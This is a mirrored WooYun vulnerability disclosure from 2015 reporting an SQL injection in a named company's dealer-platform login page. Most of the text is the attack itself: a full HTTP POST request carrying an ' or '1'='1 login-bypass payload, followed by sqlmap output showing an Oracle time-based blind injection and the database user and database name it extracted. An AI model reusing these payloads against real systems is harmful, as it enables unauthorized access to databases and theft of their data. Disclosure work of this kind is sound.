乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-28: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开
http://bslog.biostime.com.cn/dealerPlatform/
直接抓包
POST /dealerPlatform/permission/dealerLogin.do HTTP/1.1Host: bslog.biostime.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://bslog.biostime.com.cn/dealerPlatform/Content-Length: 63Cookie: JSESSIONID=162F1AF38B7A4BDD4AEBFAF83F5CBD88Connection: keep-alivePragma: no-cacheCache-Control: no-cacheuserName='+or+'1'%3D'1&passwd='+or+'1'%3D'1&checkCodeLogin=y8wx
一个数据库
Place: POSTParameter: userName Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: userName=' or '1'='1' AND 2840=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||HR(120)||CHR(68)||CHR(109),5) AND 'fYVW'='fYVW&passwd=' or '1'='1&checkCodeLogi=y8wx---[15:36:31] [INFO] the back-end DBMS is Oracleweb application technology: Nginx, JSPback-end DBMS: Oracle[15:36:31] [INFO] fetching current user[15:36:31] [INFO] resumed: DEALER_PLATcurrent user: 'DEALER_PLAT'
available databases [1]:[*] DEALER_PLAT
危害等级:无影响厂商忽略
忽略时间:2015-10-12 03:28
漏洞Rank:4 (WooYun评价)
暂无